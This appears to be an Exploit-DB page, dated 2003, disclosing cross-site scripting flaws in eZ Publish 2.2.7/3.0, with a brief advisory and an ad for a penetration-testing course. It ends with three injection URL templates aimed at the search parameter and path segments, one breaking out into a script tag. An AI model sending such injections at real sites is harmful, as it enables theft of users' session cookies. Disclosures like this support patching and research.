EZ Publish 2.2.7/3.0 - Multiple Cross-Site Scripting Vulnerabilities

EDB-ID:

22491

CVE:





Platform:

PHP

Date:

2003-04-15


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

source: https://www.securityfocus.com/bid/7348/info

Several cross site scripting vulnerabilities have been reported for eZ Publish. These vulnerabilities are due to insufficient sanitization of user-supplied data submitted to eZ Publish.

Exploitation may allow theft of cookie-based authentication credentials or other attacks. 

http://[target]/index.php/content/search/?SectionID=3&SearchText=[hostile_code]
http://[target]/index.php/[any_section]/">[hostile_code]<
http://[target]/index.php/"><script>[hostile_code]<